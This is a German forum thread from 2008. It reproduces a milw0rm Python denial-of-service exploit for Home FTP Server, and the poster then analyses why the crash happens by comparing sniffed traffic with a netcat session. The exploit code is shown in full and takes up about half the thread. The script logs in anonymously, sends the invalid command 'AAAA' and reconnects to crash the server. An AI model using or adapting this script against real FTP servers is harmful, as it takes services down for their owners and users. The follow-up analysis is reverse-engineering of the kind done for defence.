HOME FTP SERVER DoS Exploit

**DrWhiteLetter** · 18.03.2008, 17:25

Für den Home FTP Server gibts einen relativ lustigen DoS-Exploit, bisher weiß wohl noch keiner so genau, warum der Server dabei abschmiert (es kommt gleich von mir noch etwas mehr dazu).

Hier der Exploit:

Code:

# Discovered by 0in from DaRk-CodeRs Programming & Security Group
# Contact: 0in(dot)email[at]gmail(dot)com
# Thats a very funny bug, and nobody understand how it works;]
# When we send a python FTP retrlines() function bad command and create
# a new connection server got DoS... o0
# Thats not overflow, it's probubly in logic application.
# Greetings to all DaRk-CodeRs Members:
# Die_Angel, Sun8hclf, M4r1usz, Djlinux, Aristo89
# Special THX to: Rade0n3900
# Debug:
# ----------------------
# | EIP: 0100FE98 |
# | DS:[00FFFFED4]=??? |
# | ECX: 0100FED4 |
# ----------------------
from ftplib import FTP
import time
ip="127.0.0.1"
login="anonymous"
passwd = 'gorion@scriptkiddie.pl'
print '-------------------------------'
print '| HOME FTP SERVER DoS Exploit |'
print '| bY 0in From Dark-Coders! |'
print '|>>http://dark-coders.4rh.eu<<|'
print '-------------------------------'
print 'connecting...'
ftp=FTP(ip)
ftp.login(login,passwd)
print 'sending...'
try:
ftp.retrlines("AAAA")
 except Exception:
print 'ok!\nreconnecting...'
 ftp=FTP(ip)
 ftp.quit()
print 'DosEd'
#EoFF

# milw0rm.com [2008-03-17]

**DrWhiteLetter** · 18.03.2008, 17:56

Ich habe mir das gerade auch gleich einmal etwas näher angeschaut. Im Prinzip macht der obige Code nichts anderes als einen Befehl ("AAAA") an den FTP-Server zu schicken den es aber nicht gibt.

Unten im Screenshot findet ihr im rot umrahmten Kästchen den Teil, den ich bei dem Python-Exploit mit gesnifft habe. Darunter hab ich das Gleiche mit einer NetCat-Verbindung simuliert. Beim Python-Exploit liefert der FTP-Server jedoch bei der Übergabe von "AAAA" nach der Fehlermeldung noch ein "ok" (grün unterstrichen), wärend dies bei meiner NetCat Variante nicht der Fall ist.

Lediglich der Vergleich der Binär- und Hexwerte beider Befehlsübertragungen zeigt einen Unterschied, somit muss das Python-FTP-Modul hier wohl einen Fehler bei der Ascii-Übertragung machen, mit dem der Server nicht zurecht kommt.

**DrWhiteLetter** · 18.03.2008, 18:07

Hier im Anhang nochmal der Vergleich. Oben seht ihr den Teil von Python und unten die Übertragung via Netcat.

Themen-Optionen	Thema durchsuchen
Druckbare Version zeigen Diese Seite per E-Mail verschicken	Thema durchsuchen: Erweiterte Suche
Ansicht
Linear-Darstellung Zur Hybrid-Darstellung wechseln Zur Baum-Darstellung wechseln